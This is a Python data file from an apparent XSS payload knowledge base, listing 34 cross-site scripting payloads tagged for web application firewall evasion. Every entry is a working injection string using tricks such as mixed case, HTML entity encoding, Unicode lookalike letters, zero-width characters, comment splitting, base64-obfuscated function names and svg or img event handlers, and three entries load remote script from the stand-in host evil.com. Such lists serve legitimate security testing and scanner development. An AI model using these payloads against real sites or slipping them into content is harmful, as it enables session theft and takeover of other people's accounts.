#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

WAF Bypass Core Payloads - Part 1
"""

from typing import Dict

from ..models import PayloadEntry


WAF_BYPASS_CORE_PAYLOADS_PART1: Dict[str, PayloadEntry] = {
    "waf_bypass_001": PayloadEntry(
        payload="<SCRIPT>alert(1)</SCRIPT>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_002": PayloadEntry(
        payload="<Script>alert(1)</Script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_003": PayloadEntry(
        payload="&#60;script&#62;alert(1)&#60;/script&#62;",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_004": PayloadEntry(
        payload="&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_005": PayloadEntry(
        payload="<script>ⒶⓁⒺⓇⓉ(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_006": PayloadEntry(
        payload="<script>𝔞𝔩𝔢𝔯𝔱(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_007": PayloadEntry(
        payload="<script>𝕒𝕝𝕖𝕣𝕥(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_008": PayloadEntry(
        payload="<script\n>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_009": PayloadEntry(
        payload="<script\t>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_010": PayloadEntry(
        payload="<script\r>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_011": PayloadEntry(
        payload="<script>/**/alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_012": PayloadEntry(
        payload="<script>alert/**/(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_013": PayloadEntry(
        payload="<script>alert(/**/1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_014": PayloadEntry(
        payload="<svg onload=alert`1`>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_015": PayloadEntry(
        payload='<script>this["ale"+"rt"](1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_016": PayloadEntry(
        payload="<script>ale\\u200Brt(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_017": PayloadEntry(
        payload="<script>ale\\u200Crt(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_018": PayloadEntry(
        payload="<script>ale\\u200Drt(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_019": PayloadEntry(
        payload="<script>ale\\uFEFFrt(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_020": PayloadEntry(
        payload="<script>alert\\u0020(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_021": PayloadEntry(
        payload="<script>alert\\u00A0(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_022": PayloadEntry(
        payload="<script>alert\\u1680(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_023": PayloadEntry(
        payload="<script>alert\\u2000(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_024": PayloadEntry(
        payload='<script>window[atob("YWxlcnQ=")](1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_025": PayloadEntry(
        payload='<script>this[atob("YWxlcnQ=")](1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_026": PayloadEntry(
        payload='<script>self[atob("YWxlcnQ=")](1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_027": PayloadEntry(
        payload="<ScRiPt/**/sRc=//evil.com></ScRiPt>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_028": PayloadEntry(
        payload="<ScRiPt%20sRc=//evil.com></ScRiPt>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_029": PayloadEntry(
        payload="<ScRiPt%09sRc=//evil.com></ScRiPt>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_030": PayloadEntry(
        payload='<img/src="x"/onerror=alert(1)>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_031": PayloadEntry(
        payload='<img%20src="x"%20onerror=alert(1)>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_032": PayloadEntry(
        payload='<img%2Fsrc="x"%2Fonerror=alert(1)>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_033": PayloadEntry(
        payload='<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_034": PayloadEntry(
        payload='<svg xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
}
